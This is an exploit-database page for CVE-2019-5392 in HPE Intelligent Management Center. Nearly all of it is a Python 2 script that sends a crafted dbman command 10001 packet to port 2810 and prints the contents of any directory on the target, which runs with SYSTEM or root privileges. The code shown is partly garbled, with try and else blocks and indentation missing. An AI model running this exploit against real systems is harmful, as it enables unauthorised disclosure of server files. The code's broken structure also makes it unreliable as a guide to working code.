HPE Intelligent Management Center < 7.3 E0506P09 - Information Disclosure

  • 作者: Lazy Hacker
    日期: 2019-09-23
  • 类别:
  • 来源:https://www.exploit-db.com/exploits/47408/
  • #!/opt/local/bin/python2.7
    # Exploit Title: HPE Intelligent Management Center dbman Command 10001 Information Disclosure
    # Date: 22-09-2019
    # Exploit Author: Rishabh Sharma (Linkedin: rishabh2241991)
    # Vendor Homepage: www.hpe.com
    # Software Link: https://h10145.www1.hpe.com/Downloads/DownloadSoftware.aspx?SoftwareReleaseUId=16759&ProductNumber=JG747AAE&lang=en&cc=us&prodSeriesId=4176535&SaidNumber=
    # Tested on Version: iMC_PLAT_7.1_E0302_Standard_Windows and iMC_PLAT_7.2_E0403_Std_Win
    # Tested on: Windows 7
    # CVE : CVE-2019-5392
    # Conversion of Nessus Plugin to Python Exploit
    # Nessus Plugin Name: hp_imc_dbman_cmd_10001_info_disclosure.nasl
    # Description: This vulnerability allow remote attacker to view the contents of arbitrary directories under the security context of the SYSTEM or root user.
    # See Also: https://www.tenable.com/plugins/nessus/118038
    from pyasn1.type.univ import *
    from pyasn1.type.namedtype import *
    from pyasn1.codec.ber import encoder
    import struct
    import binascii
    import socket, sys
    import sys
    import re
    if len(sys.argv) != 4:
    print "USAGE: python %s <ip> <port> <directory>" % (sys.argv[0])
    ip = sys.argv[1]
    port = int(sys.argv[2]) # Default Port 2810
    directory = sys.argv[3]
    payload = directory.replace("\\","\\\\") 
    opcode = 10001
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print "Socket Created.."
    except socket.error:
    	print 'Failed to create socket'
    victim_address = (ip,port)
    print('connecting to {} port {}'.format(*victim_address))
    sock.connect((ip, port))
    class DbmanMsg(Sequence):
    componentType = NamedTypes(
    NamedType('flag', Integer()),
    NamedType('dir', OctetString())
    data = DbmanMsg()
    data['flag'] = 1
    data['dir'] = payload
    encodeddata = encoder.encode(data, defMode=False)
    dataLen = len(encodeddata)
    values = (opcode, dataLen, encodeddata)
    s = struct.Struct(">ii%ds" % dataLen)
    packed_data = s.pack(*values)
    print 'Format string:', s.format
    print 'Uses :',s.size, 'bytes'
    print 'Packed Value :', binascii.hexlify(packed_data)
    print '\n'
    print 'Sending Payload...'
    BUFF_SIZE = 4000
    res = sock.recv(BUFF_SIZE)
    rec =len(res)
    if (rec == 0):
    	print "No data in the directory"
    print "Data Recived: "+str(rec)
    	a = repr(res)
    	b = a
    	b = re.sub(r'(x\d\d)', '', b)
    	b = re.sub(r'(\\x[\d].)', '', b)
    	b = re.sub(r'(\\x..)', '', b)
    	replacestring = ['"','\\n','\\r','\\t','0']
    	print "Data in "+payload+" Directory: \n"
    	for r in replacestring:
    		b = b.replace(r,'')
    	b = b.replace("'","")
    	#print b #Remove '#' if output results is not proper
    	matches = re.finditer(r"([\\]*)([.[a-zA-Z\d\s]*)", b, re.MULTILINE)
    	for matchNum, match in enumerate(matches, start=1):
    		print match.group(2)
    print "Done..."